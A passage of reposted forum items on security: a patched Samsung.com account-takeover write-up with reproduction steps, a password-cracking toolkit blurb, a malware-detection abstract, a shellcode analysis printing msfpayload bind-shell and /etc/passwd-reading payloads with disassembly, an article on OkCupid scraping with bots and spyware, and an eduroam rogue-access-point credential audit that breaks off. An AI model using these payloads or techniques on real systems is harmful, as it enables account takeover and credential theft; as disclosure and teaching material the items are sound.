  20. Samsung.com Account Takeover Vulnerability Write-up First of all let me say this: Hurray! They fixed it! After contacting Samsung multiply times I thought they’d completely blown me off in fixing this bug but it looks patched (hopefully!). EDIT: Samsung contacted me and said thanks for the report of the vulnerability. They seemed sincerely interested in fixing the problem – quite the opposite of my initial impression with them (their initial impression of me must’ve been odd considering I’m pretty sick with a cold at the time of this writing). The Vulnerability All Samsung.com accounts can be taken over due to an issue with character removal after authentication. When you register at New URL you can add extra spaces to the end of your account name and it will be registered as a separate account altogether. Alone this is not a big issue (other than perhaps spamming an email address by making multiple accounts with additional spaces after them). However, upon navigating to a Samsung subdomain such as Samsung US | TVs - Tablets - Smartphones - Cameras - Laptops - Refrigerators these trailing spaces are scrubbed from your username. Once this happens and you navigate back to Samsung.com you are authenticated as just a regular email address without any trailing spaces – effectively taking over your target’s account. So if your username was originally “admin@samsung.com<SPACE><SPACE>”, after visiting Samsung US | TVs - Tablets - Smartphones - Cameras - Laptops - Refrigerators it would be scrubbed to “admin@samsung.com”. Apparently scrubbing isn’t always a good thing (the security puns don’t get worse than that!) More Detailed instructions (Now patched, at least for shop.us.samsung.com): 1. Register an account at Samsung.com with the email address of a target, use Tamper Data or another HTTP intercept tool and add trailing spaces to the username. 2. Complete the account registration process 3. Navigate to “shop.us.samsung.com”, ex: http://shop.us.samsung.com/store?Action=DisplayCustomerServiceOrderSearchPage&Locale-en_US&SiteID=samsung 4. Navigate back to the main Samsung.com domain, ex: Galaxy Note 10.1- 2014 Edition 5. Proceed to attempt to add items to your cart and go to checkout page 6. Notice the account details and cards on file are those of your target Sadly because this isn’t a Samsung TV there is no bug bounty for this exploit, but oh well. Proof of Concept Video Sursa: Samsung.com Account Takeover Vulnerability Write-up | The Hacker Blog
  21. [h=2]PACK – Password Analysis & Cracking Kit[/h] PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers. Before using the PACK, you must establish a selection criteria of password lists. Since we are looking to analyze the way people create their passwords, we must obtain as large of a sample of leaked passwords as possible. One such excellent list is based on RockYou.com compromise. This list both provides large and diverse enough collection that provides a good results for common passwords used by similar sites (e.g. social networking). The analysis obtained from this list may not work for organizations with specific password policies. As such, selecting sample input should be as close to your target as possible. In addition, try to avoid obtaining lists based on already cracked passwords as it will generate statistics bias of rules and masks used by individual(s) cracking the list and not actual users. Please note this tool does not, and is not created to, crack passwords – it just aids the analysis of passwords sets so you can focus your cracking more accurately/efficiently/effectively. You can download PACK here: PACK-0.0.4.tar.gz Or read more here. Sursa: PACK - Password Analysis & Cracking Kit - Darknet - The Darkside
  22. MARD: A Framework for Metamorphic Malware Analysis and Real-Time Detection Shahid Alam Department of Computer Science University of Victoria, BC, V8P5C2 E-mail: salam@cs.uvic.ca November 11, 2013 Introduction and Motivation End point security is often the last defense against a security threat. An end point can be a desktop, a server, a laptop, a kiosk or a mobile device that connects to a network (Internet). Recent statistics by the ITU (International Telecommunications Union) [40] show that the number of Internet users (i.e: people connecting to the Internet using these end points) in the world have increased from 20% in 2006 to 35% (almost 2 billion in total) in 2011. A study carried out by Symantec about the impacts of cybercrime reports, that worldwide losses due to malware attacks and phishing between July 2011 and July 2012 were $110 billion [26]. According to the 2011 Symantec Internet security threat report [25] there was an 81% increase in the malware attacks over 2010, and 403 million new malware were created a 41% increase over 2010. In 2012 there was a 42% increase in the malware attacks over 2011. Web-based attacks increased by 30 percent in 2012. With these increases and the anticipated future increases, these end points pose a new security challenge [56] to the security professionals and researchers in industry and in academia, to devise new methods and techniques for malware detection and protection. There are numerous denitions in the literature of a malware, also called a malicious code that includes viruses, worms, spywares and trojans. Here I am going to use one of the earliest denitions by Gary McGraw and Greg Morrisett [49]: Malicious code is any code added, changed, or removed from a software system in order to intentionally cause harm or subvert the intended function of the system. A malware carries out activities such as: setting up a back door for a bot, setting up a keyboard logger and stealing personal information etc. Antimalware software detects and neutralizes the eects of a malware. There are two basic detection techniques [39]: anomaly-based and signature-based. Anomaly-based detection technique uses the knowledge of the behavior of a normal program to decide if the program under inspection is malicious or not. Signature-based detection technique uses the characteristics of a malicious program to decide if the program under inspection is malicious or not. Each of the techniques can be performed statically (before the program executes), dynamically (during or after the program execution) or both statically and dynamically (hybrid). Download: http://webhome.cs.uvic.ca/~salam/PhD/TR-MARD.pdf
  23. Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86. linux/x86/exec I choosed the linux/x86/exec shellcode as first example. With: $ msfpayload linux/x86/exec cmd="ls" R | ndisasm -u - it is possible to disassemble the shellcode: 00000000 6A0B push byte +0xb 00000002 58 pop eax 00000003 99 cdq 00000004 52 push edx 00000005 66682D63 push word 0x632d 00000009 89E7 mov edi,esp 0000000B 682F736800 push dword 0x68732f 00000010 682F62696E push dword 0x6e69622f 00000015 89E3 mov ebx,esp 00000017 52 push edx 00000018 E803000000 call dword 0x20 0000001D 6C insb 0000001E 7300 jnc 0x20 00000020 57 push edi 00000021 53 push ebx 00000022 89E1 mov ecx,esp 00000024 CD80 int 0x80 I will now comment the relevant lines of the shellcode. 00000000 6A0B push byte +0xb 00000002 58 pop eax EAX is set to 0xb = 11. This is the number for execve: $ grep 11 /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_execve 11 ... SNIP ... 00000003 99 cdq 00000004 52 push edx Set edx to zero and push it in the stack for termination. 00000005 66682D63 push word 0x632d This pushes “-c” on the stack. 00000009 89E7 mov edi,esp Move the stackpointer to EDI. So EDI is pointing to “-c”. 0000000B 682F736800 push dword 0x68732f 00000010 682F62696E push dword 0x6e69622f 00000015 89E3 mov ebx,esp Push /bin/sh to the stack and move the stackpointer to EBX. EBX is pointing to “/bin/sh”. It can be seen, that the ls command is not executed directly. A shell is called with the -c option. From the bash man page: “-c string If the -c option is present, then commands are read from string. If there are arguments after the string, they are assigned to the positional parameters, starting with $0.” 00000017 52 push edx Push some zeros again. 00000018 E803000000 call dword 0x20 This one jumps to 0×20. 00000020 57 push edi 00000021 53 push ebx 00000022 89E1 mov ecx,esp 00000024 CD80 int 0x80 EDI (-c), EBX (/bin/sh) and are pushed on the stack, ECX is moved to ESP and the function is called. Now here comes the interesting part. It is not possible to get the command “ls” from debugging with gdb nor analyzing it with libemu. But the ls (as hex: 6c 73) command is in the code. 0000001D 6C insb 0000001E 7300 jnc 0x20 I think that the ls is pushed on the stack too, although the debugger does not notice anything of that… hmpf. So maybe libemu can help us here. For analyzing the shellcode with libemu I use: $ msfpayload linux/x86/exec cmd="ls" R | sctest -vvv -Ss 100000 -G Exec.dot The ls command should be executed. The output is showing exactly how the execve call is build. ... SNIP ... [emu 0x0x8f3e088 debug ] Flags: int execve ( const char * dateiname = 0x00416fc0 => = "/bin/sh"; const char * argv[] = [ = 0x00416fb0 => = 0x00416fc0 => = "/bin/sh"; = 0x00416fb4 => = 0x00416fc8 => = "-c"; = 0x00416fb8 => = 0x0041701d => = "ls"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; ... SNIP ... Here it can be seen, that the “ls” command is on the stack too. From the Exec.dot file a diagram can be made for illustrating the programm execution. dot Exec.dot -Tpng -o Exec.dot.png Exec.dot That was it for the first shellcode. linux/x86/shell_bind_tcp For the second shellcode to analyze I choosed linux/x86/shell_bind_tcp. Disassembling works as follows: $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | ndisasm -u - 00000000 31DB xor ebx,ebx 00000002 F7E3 mul ebx 00000004 53 push ebx 00000005 43 inc ebx 00000006 53 push ebx 00000007 6A02 push byte +0x2 00000009 89E1 mov ecx,esp 0000000B B066 mov al,0x66 0000000D CD80 int 0x80 0000000F 5B pop ebx 00000010 5E pop esi 00000011 52 push edx 00000012 680200115C push dword 0x5c110002 00000017 6A10 push byte +0x10 00000019 51 push ecx 0000001A 50 push eax 0000001B 89E1 mov ecx,esp 0000001D 6A66 push byte +0x66 0000001F 58 pop eax 00000020 CD80 int 0x80 00000022 894104 mov [ecx+0x4],eax 00000025 B304 mov bl,0x4 00000027 B066 mov al,0x66 00000029 CD80 int 0x80 0000002B 43 inc ebx 0000002C B066 mov al,0x66 0000002E CD80 int 0x80 00000030 93 xchg eax,ebx 00000031 59 pop ecx 00000032 6A3F push byte +0x3f 00000034 58 pop eax 00000035 CD80 int 0x80 00000037 49 dec ecx 00000038 79F8 jns 0x32 0000003A 682F2F7368 push dword 0x68732f2f 0000003F 682F62696E push dword 0x6e69622f 00000044 89E3 mov ebx,esp 00000046 50 push eax 00000047 53 push ebx 00000048 89E1 mov ecx,esp 0000004A B00B mov al,0xb 0000004C CD80 int 0x80 And here is the output from the libemu analysis. $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | sctest -vvv -Ss 100000 -G shell_bind_tcp.dot ... SNIP ... int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; int bind ( int sockfd = 14; struct sockaddr_in * my_addr = 0x00416fc2 => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 0 (host=0.0.0.0); }; char sin_zero = " "; }; int addrlen = 16; ) = 0; int listen ( int s = 14; int backlog = 0; ) = 0; int accept ( int sockfd = 14; sockaddr_in * addr = 0x00000000 => none; int addrlen = 0x00000010 => none; ) = 19; int dup2 ( int oldfd = 19; int newfd = 14; ) = 14; int dup2 ( int oldfd = 19; int newfd = 13; ) = 13; int dup2 ( int oldfd = 19; int newfd = 12; ) = 12; int dup2 ( int oldfd = 19; int newfd = 11; ) = 11; int dup2 ( int oldfd = 19; int newfd = 10; ) = 10; int dup2 ( int oldfd = 19; int newfd = 9; ) = 9; int dup2 ( int oldfd = 19; int newfd = 8; ) = 8; int dup2 ( int oldfd = 19; int newfd = 7; ) = 7; int dup2 ( int oldfd = 19; int newfd = 6; ) = 6; int dup2 ( int oldfd = 19; int newfd = 5; ) = 5; int dup2 ( int oldfd = 19; int newfd = 4; ) = 4; int dup2 ( int oldfd = 19; int newfd = 3; ) = 3; int dup2 ( int oldfd = 19; int newfd = 2; ) = 2; int dup2 ( int oldfd = 19; int newfd = 1; ) = 1; int dup2 ( int oldfd = 19; int newfd = 0; ) = 0; int execve ( const char * dateiname = 0x00416fb2 => = "/bin//sh"; const char * argv[] = [ = 0x00416faa => = 0x00416fb2 => = "/bin//sh"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; ... SNIP ... I analyze the relevant parts of the shellcode, I will use both, the disassembly and the libemu output for further explanation. 00000000 31DB xor ebx,ebx 00000002 F7E3 mul ebx 00000004 53 push ebx 00000005 43 inc ebx 00000006 53 push ebx 00000007 6A02 push byte +0x2 00000009 89E1 mov ecx,esp 0000000B B066 mov al,0x66 0000000D CD80 int 0x80 First the EBX and the EAX registers are filled with zeros. EBX is pushed on the stack, then EBX is set to one and again pushed on the stack. After this two is pushed on the stack. After this the stack address is set to ECX, and EAX is 66. This is the syscall (102) for the socketcall function, which is called afterward. In this case the socket() functions is executed. The rorresponding libemu output: int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; 0000000F 5B pop ebx 00000010 5E pop esi 00000011 52 push edx 00000012 680200115C push dword 0x5c110002 00000017 6A10 push byte +0x10 00000019 51 push ecx 0000001A 50 push eax 0000001B 89E1 mov ecx,esp 0000001D 6A66 push byte +0x66 0000001F 58 pop eax 00000020 CD80 int 0x80 To shorten things a little, this part calls the bind function (which is EAX syscall 102 and EBX 1 = SYS_SOCKET = socket() ). This correspondence with the libemu output (the whole output can be seen below). int bind ( int sockfd = 14; struct sockaddr_in * my_addr = 0x00416fc2 => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 0 (host=0.0.0.0); }; char sin_zero = " "; }; int addrlen = 16; ) = 0; 5c11 is port 4444 btw. 00000022 894104 mov [ecx+0x4],eax 00000025 B304 mov bl,0x4 00000027 B066 mov al,0x66 00000029 CD80 int 0x80 Here EAX = ffffff66 and EBX = 4, this is defining the listen() function. $ less /usr/include/linux/net.h | grep 4 #define SYS_LISTEN 4 /* sys_listen(2) */ Here is the libemu output: int listen ( int s = 14; int backlog = 0; ) = 0; 0000002B 43 inc ebx 0000002C B066 mov al,0x66 0000002E CD80 int 0x80 EBX is now 5, which defines the accept function… int accept ( int sockfd = 14; sockaddr_in * addr = 0x00000000 => none; int addrlen = 0x00000010 => none; ) = 19; 00000030 93 xchg eax,ebx 00000031 59 pop ecx 00000032 6A3F push byte +0x3f 00000034 58 pop eax 00000035 CD80 int 0x80 00000037 49 dec ecx 00000038 79F8 jns 0x32 EAX = 3f = 63, this is the syscall for dup2. $ grep 63 /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_dup2 63 This procedure is repeated until ECX=0, so we have any descriptor included. 0000003A 682F2F7368 push dword 0x68732f2f 0000003F 682F62696E push dword 0x6e69622f 00000044 89E3 mov ebx,esp 00000046 50 push eax 00000047 53 push ebx 00000048 89E1 mov ecx,esp 0000004A B00B mov al,0xb 0000004C CD80 int 0x80 Finally we have the execve call. This works pretty much as in the analysis of the linux/x86/exec shellcode. int execve ( const char * dateiname = 0x00416fb2 => = "/bin//sh"; const char * argv[] = [ = 0x00416faa => = 0x00416fb2 => = "/bin//sh"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; I also used the debugger for analyzing the shellcode, but I think the output there is no more help. And finally the flowchart. $ dot shell_bind_tcp.dot -Tpng -o shell_bind_tcp.dot.png shell_bind_tcp.dot So that was it for the second analysis. linux/x86/read_file So let us start by disassembling the shellcode: $ sudo msfpayload linux/x86/read_file PATH="/etc/passwd" R | ndisasm -u - 00000000 EB36 jmp short 0x38 00000002 B805000000 mov eax,0x5 00000007 5B pop ebx 00000008 31C9 xor ecx,ecx 0000000A CD80 int 0x80 0000000C 89C3 mov ebx,eax 0000000E B803000000 mov eax,0x3 00000013 89E7 mov edi,esp 00000015 89F9 mov ecx,edi 00000017 BA00100000 mov edx,0x1000 0000001C CD80 int 0x80 0000001E 89C2 mov edx,eax 00000020 B804000000 mov eax,0x4 00000025 BB01000000 mov ebx,0x1 0000002A CD80 int 0x80 0000002C B801000000 mov eax,0x1 00000031 BB00000000 mov ebx,0x0 00000036 CD80 int 0x80 00000038 E8C5FFFFFF call dword 0x2 0000003D 2F das 0000003E 657463 gs jz 0xa4 00000041 2F das 00000042 7061 jo 0xa5 00000044 7373 jnc 0xb9 00000046 7764 ja 0xac 00000048 00 db 0x00 Libemu and sctest did not work for me. So I will only look at the disassembly and debugging. First things first: The shellcode is using the JMP-CALL-POP technique. This can be seen very good by stepping throught the code but also by having a look at the disassembled code. 00000000 EB36 jmp short 0x38 Jump to address 0×38. 00000038 E8C5FFFFFF call dword 0x2 0000003D 2F das 0000003E 657463 gs jz 0xa4 00000041 2F das 00000042 7061 jo 0xa5 00000044 7373 jnc 0xb9 00000046 7764 ja 0xac 00000048 00 db 0x00 Call 0×2. Be aware 3D – 48 is a data section. Here is nothing else as the path: /etc/passwd. 00000002 B805000000 mov eax,0x5 00000007 5B pop ebx 00000008 31C9 xor ecx,ecx 0000000A CD80 int 0x80 Move 5 to EAX for syscall 5, which is open(). Point EBX to /etc/passwd, and execute. Return the file descriptor to EAX, for example 3. 0000000C 89C3 mov ebx,eax 0000000E B803000000 mov eax,0x3 00000013 89E7 mov edi,esp 00000015 89F9 mov ecx,edi 00000017 BA00100000 mov edx,0x1000 0000001C CD80 int 0x80 Here the syscall for read() is executed. For this, EAX and EBX are set to 3. EBX contains the file descriptor, ECX points EDI. EDX which presents the size is set to 1000. 0000001E 89C2 mov edx,eax 00000020 B804000000 mov eax,0x4 00000025 BB01000000 mov ebx,0x1 0000002A CD80 int 0x80 So finally the result is written (syscall 4 is write()) to the standart output. 0000002C B801000000 mov eax,0x1 00000031 BB00000000 mov ebx,0x0 00000036 CD80 int 0x80 And exit. So that was it for the last analysis. This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: Assembly Language and Shellcoding on Linux
  24. How a Math Genius Hacked OkCupid to Find True Love By Kevin Poulsen 01.21.14 6:30 AM Mathematician Chris McKinlay hacked OKCupid to find the girl of his dreams. Emily Shur Chris McKinlay was folded into a cramped fifth-floor cubicle in UCLA’s math sciences building, lit by a single bulb and the glow from his monitor. It was 3 in the morn*ing, the optimal time to squeeze cycles out of the supercomputer in Colorado that he was using for his PhD dissertation. (The subject: large-scale data processing and parallel numerical methods.) While the computer chugged, he clicked open a second window to check his OkCupid inbox. McKinlay, a lanky 35-year-old with tousled hair, was one of about 40 million Americans looking for romance through websites like Match.com, J-Date, and e-Harmony, and he’d been searching in vain since his last breakup nine months earlier. He’d sent dozens of cutesy introductory messages to women touted as potential matches by OkCupid’s algorithms. Most were ignored; he’d gone on a total of six first dates. On that early morning in June 2012, his compiler crunching out machine code in one window, his forlorn dating profile sitting idle in the other, it dawned on him that he was doing it wrong. He’d been approaching online matchmaking like any other user. Instead, he realized, he should be dating like a mathematician. OkCupid was founded by Harvard math majors in 2004, and it first caught daters’ attention because of its computational approach to matchmaking. Members answer droves of multiple-choice survey questions on everything from politics, religion, and family to love, sex, and smartphones. On average, respondents select 350 questions from a pool of thousands—“Which of the following is most likely to draw you to a movie?” or “How important is religion/God in your life?” For each, the user records an answer, specifies which responses they’d find acceptable in a mate, and rates how important the question is to them on a five-point scale from “irrelevant” to “mandatory.” OkCupid’s matching engine uses that data to calculate a couple’s compatibility. The closer to 100 percent—mathematical soul mate—the better. But mathematically, McKinlay’s compatibility with women in Los Angeles was abysmal. OkCupid’s algorithms use only the questions that both potential matches decide to answer, and the match questions McKinlay had chosen—more or less at random—had proven unpopular. When he scrolled through his matches, fewer than 100 women would appear above the 90 percent compatibility mark. And that was in a city containing some 2 million women (approximately 80,000 of them on OkCupid). On a site where compatibility equals visibility, he was practically a ghost. He realized he’d have to boost that number. If, through statistical sampling, McKinlay could ascertain which questions mattered to the kind of women he liked, he could construct a new profile that honestly answered those questions and ignored the rest. He could match every woman in LA who might be right for him, and none that weren’t. Chris McKinlay used Python scripts to riffle through hundreds of OkCupid survey questions. He then sorted female daters into seven clusters, like “Diverse” and “Mindful,” each with distinct characteristics. Maurico Alejo Even for a mathematician, McKinlay is unusual. Raised in a Boston suburb, he graduated from Middlebury College in 2001 with a degree in Chinese. In August of that year he took a part-time job in New York translating Chinese into English for a company on the 91st floor of the north tower of the World Trade Center. The towers fell five weeks later. (McKinlay wasn’t due at the office until 2 o’clock that day. He was asleep when the first plane hit the north tower at 8:46 am.) “After that I asked myself what I really wanted to be doing,” he says. A friend at Columbia recruited him into an offshoot of MIT’s famed professional blackjack team, and he spent the next few years bouncing between New York and Las Vegas, counting cards and earning up to $60,000 a year. The experience kindled his interest in applied math, ultimately inspiring him to earn a master’s and then a PhD in the field. “They were capable of using mathema*tics in lots of different situations,” he says. “They could see some new game—like Three Card Pai Gow Poker—then go home, write some code, and come up with a strategy to beat it.” Now he’d do the same for love. First he’d need data. While his dissertation work continued to run on the side, he set up 12 fake OkCupid accounts and wrote a Python script to manage them. The script would search his target demographic (heterosexual and bisexual women between the ages of 25 and 45), visit their pages, and scrape their profiles for every scrap of available information: ethnicity, height, smoker or nonsmoker, astrological sign—“all that crap,” he says. To find the survey answers, he had to do a bit of extra sleuthing. OkCupid lets users see the responses of others, but only to questions they’ve answered themselves. McKinlay set up his bots to simply answer each question randomly—he wasn’t using the dummy profiles to attract any of the women, so the answers didn’t mat*ter—then scooped the women’s answers into a database. McKinlay watched with satisfaction as his bots purred along. Then, after about a thousand profiles were collected, he hit his first roadblock. OkCupid has a system in place to prevent exactly this kind of data harvesting: It can spot rapid-fire use easily. One by one, his bots started getting banned. He would have to train them to act human. He turned to his friend Sam Torrisi, a neuroscientist who’d recently taught McKinlay music theory in exchange for advanced math lessons. Torrisi was also on OkCupid, and he agreed to install spyware on his computer to monitor his use of the site. With the data in hand, McKinlay programmed his bots to simulate Torrisi’s click-rates and typing speed. He brought in a second computer from home and plugged it into the math department’s broadband line so it could run uninterrupted 24 hours a day. After three weeks he’d harvested 6 million questions and answers from 20,000 women all over the country. McKinlay’s dissertation was relegated to a side project as he dove into the data. He was already sleeping in his cubicle most nights. Now he gave up his apartment entirely and moved into the dingy beige cell, laying a thin mattress across his desk when it was time to sleep. For McKinlay’s plan to work, he’d have to find a pattern in the survey data—a way to roughly group the women according to their similarities. The breakthrough came when he coded up a modified Bell Labs algorithm called K-Modes. First used in 1998 to analyze diseased soybean crops, it takes categorical data and clumps it like the colored wax swimming in a Lava Lamp. With some fine-tuning he could adjust the viscosity of the results, thinning it into a slick or coagulating it into a single, solid glob. He played with the dial and found a natural resting point where the 20,000 women clumped into seven statistically distinct clusters based on their questions and answers. “I was ecstatic,” he says. “That was the high point of June.” He retasked his bots to gather another sample: 5,000 women in Los Angeles and San Francisco who’d logged on to OkCupid in the past month. Another pass through K-Modes confirmed that they clustered in a similar way. His statistical sampling had worked. Now he just had to decide which cluster best suited him. He checked out some profiles from each. One cluster was too young, two were too old, another was too Christian. But he lingered over a cluster dominated by women in their mid-twenties who looked like indie types, musicians and artists. This was the golden cluster. The haystack in which he’d find his needle. Somewhere within, he’d find true love. Actually, a neighboring cluster looked pretty cool too—slightly older women who held professional creative jobs, like editors and designers. He decided to go for both. He’d set up two profiles and optimize one for the A group and one for the B group. He text-mined the two clusters to learn what interested them; teaching turned out to be a popular topic, so he wrote a bio that emphasized his work as a math professor. The important part, though, would be the survey. He picked out the 500 questions that were most popular with both clusters. He’d already decided he would fill out his answers honestly—he didn’t want to build his future relationship on a foundation of computer-generated lies. But he’d let his computer figure out how much importance to assign each question, using a machine-learning algorithm called adaptive boosting to derive the best weightings. Sursa: How a Math Genius Hacked OkCupid to Find True Love - Wired Science
  25. eduroam WiFi security audit or why it is broken by design Over Christmas I got a TP-Link TL-WN722N USB WiFi device which is supported by hostapd and finally I could test what I always wanted to test: eduroam. But first, what is eduroam? Eduroam is a WiFi network located at universities around the world with the goal to provide internet access to students and university staff on every university that supports eduroam ( https://en.wikipedia.org/wiki/Eduroam ). This means I can connect to the internet with eduroam at a university in France with my user credentials from my university in Germany. Sounds good, but how does it work? Well, the WiFi network uses WPA-Enterprise, which means you connect to an access point and the access point uses an radius server to authenticate you. Generally not a bad idea. But my tests have shown that the eduroam network is broken by design. In advance First things first. Some of my notes that I took from my tests can be seen here. I will provide them as a "POC||GTFO". But I stripped them to not provide a step by step tutorial in "how to pwn eduroam". The set-up I configured a VM with Debian Wheezy with an installation of hostapd. I never had configured a radiusd and wondered how I can get the user credentials if a client device would authenticate to my rogue access point. Well, I found this cool project https://github.com/brad-anton/freeradius-wpe.git. This does everything for me and I do not have to patch the radiusd myself. But honestly, I do not trust this modified radiusd entirely and after I configured everything I turned of the network interface of the VM which provides an internet connection to prevent the radiusd from leaking something of my tests to the internet. Test without a certificate modification On my first test I just set everything up and started it. I started wpa_supplicant on my laptop and it does not connect to the rogue access point because the certificate is wrong. Ok, but what with my Android device. I activated the WiFi on my mobile phone and ... WTF I am connected to the rogue access point. In the log file of the rogue access point I can read my user credentials in PLAINTEXT. Ok, that is not good. But what went wrong? The certificate used by the rogue access point is still invalid. The configuration on my Android device is completly flawed. I configured my Android device like the tutorial on my universities website said. The tutorial said that I do not have to configure any CA and use PAP for the phase2 of the WPA-Enterprise authentication. Now you can say "Idiot, everyone can see that this is wrong!". But to my defense, I always thought that Android then uses its own installed CAs to check if the certificate of the access point is valid. Hell, even the network-manager on ubuntu warns you if you give no CA in the settings. And I used PAP (I knew it sends the user credentials in cleartext) because I thought of the tutorials of my university that eduroam does only support PAP for the phase2 authentication. But both thoughts were wrong. After I installed the "Deutsche_Telekom_Root_CA_2" CA on my Android device and used it in the WiFi configuration it no longer connects to the rogue access point. Also, when the wpa_supplicant configuration misses this line: ca_cert="/etc/ssl/certs/Deutsche_Telekom_Root_CA_2.pem" it also ignores the invalid certificate of the access point and just connects to it. I wrote the helpdesk of my university about the wrong tutorial for using eduroam on Android devices. The helpdesk replied to me that they knew this problem with the CA but Android is not able to verify the certificate of the access point. This is obviously wrong. And the funny thing about this is, they used screenshots in their tutorial to make it easier for everyone to configure eduroam on Android devices. And on these screenshots you can see the "CA certificate" option which is just ignored. Also their reply told me some other interesting things about eduroam, which I checked in my next tests. As a summary for my first test: always configure the CA for eduroam (and in general for all WPA-Enterprise WiFi networks) and always use MSCHAPv2 instead of PAP. Even if your device connects to a rogue access point the adversary only gets challenge-response values and has to brute-force this. When your password is strong enough, the adversary can not use your credentials (at least he has to spend time brute-forcing MSCHAPv2 ...). Test with an own certificate In the eMail reply of the helpdesk of my university they wrote me that when the user added the CA to his WiFi settings, this would destroy the idea behind eduroam (to be able to connect to every eduroam access point in the world). First, I wondered about the "destroy the idea behind eduroam" part but then I thought "They would not be so stupid, would they?". I always thought that they agreed to use the "Deutsche_Telekom_Root_CA_2" CA for eduroam. But this is not the case. A friend of mine was in Belgium and had to change the configured CA in his WiFi settings to connect to eduroam there. I searched through some websites for eduroam tutorials of universities of other countries than Germany and they all used different CAs. Normally, the access point is configured to use a specific radius server which will send the certificate to the client (I do not know if it is even possible to use WPA-Enterprise in any other way). This means that by not agreeing on one CA for the entire eduroam infrastructure, the user has to NOT configure any CA in his WiFi settings to be able to use eduroam in the way it was intended to. And with this, we have the first reason for eduroam being insecure by design. The eMail also stated that even if the user added the CA to his WiFi configuration, this would not help. An adversary could get a certificate signed by the CA and could therefore set up a rouge access point. This statement is true. But this holds for every public key infrastructure. For HTTPS for example a CA should not sign my certificate for "gmail.com" (unless I can prove that this is my domain/address). And at this point a question comes to mind. The client gets the certificate by the access point and then checks with the configured CA if it is valid. But valid for what address? Normally, the CN (common name) in the certificate is checked with the used address. But with what address is the certificate provided by the radius server checked? A valid connection to the eduroam WiFi at my university with wpa_supplicant looks like this: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with 00:25:45:b5:38:22 wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully wlan0: WPA: Key negotiation completed with 00:25:45:b5:38:22 [PTK=CCMP GTK=TKIP] wlan0: CTRL-EVENT-CONNECTED - Connection to 00:25:45:b5:38:22 completed (auth) [id=0 id_str=] The address given in the CN is "radius.ruhr-uni-bochum.de". But I never configured this anywhere. So in my next test I created my own CA and signed my own certificate with it. The certificate for the rogue access point and the CA got the following values: CA: C=DE ST=Some-State O=h4des.org CN=sqall certificate for rogue access point: C=DE ST=Some-State O=h4des.org CN=some-rogue-access-point emailAddress=sqall You can see, that the CN field got "some-rogue-access-point" as value, which is no address for a radius server at all. First I tried wpa_supplicant with my newly created CA certificate in the configuration file: ca_cert="./CA.cert.pem" And what happened? wpa_supplicant connects with the rogue access point without any problems and discloses my user credentials as MSCHAPv2 challenge-response values. The output of wpa_supplicant shows that the radius server uses my newly created certificate. wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Some-State/O=h4des.org/CN=sqall' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Some-State/O=h4des.org/CN=some-rogue-access-point/emailAddress=sqall' EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request Next I tested it on my Android 4.0.4 device. I installed my own CA on the device and changed the eduroam WiFi settings to check for this CA. The device connects with the rogue access point without any problems and also discloses my user credentials. As a summary for this test: the certificate for the rogue access point just have to be a valid certificate signed by the used CA. It does not matter for which address the certificate was issued, it just have to be valid. Normally, the problem for forging a valid host in an TLS/SSL connection (such as the HTTPS example for "gmail.com" I gave earlier) is, that a CA does not sign your certificate request unless you own the domain/address (or rather the CA should not). But if you can use any address in the CN, it is no problem to get a signed certificate. Here lies the second reason for eduroam being insecure by design. I do not know if the vendor got a service to sign your own certificates with the "Deutsche_Telekom_Root_CA_2" certificate. But normally they do. And if the vendor does, there is absolutely no problem to configure a rogue access point which can not be distinguished from a valid one. It should be mentioned, that the address of the radius server can be configured in the iDevice profiles. But I have no iDevice and so I can not check if the CN of the certificate provided by the radius server is checked against the configured address. In wpa_supplicant for example I did not found any configuration option for the address of the radius server. But I found the option to match certain criteria of the accepted server certificate with "subject_match". Android 4.0.4 does not provide any such options. Test with an own intermediate CA After an arbitrary signed certificate was tested, the next interesting thing is a certificate 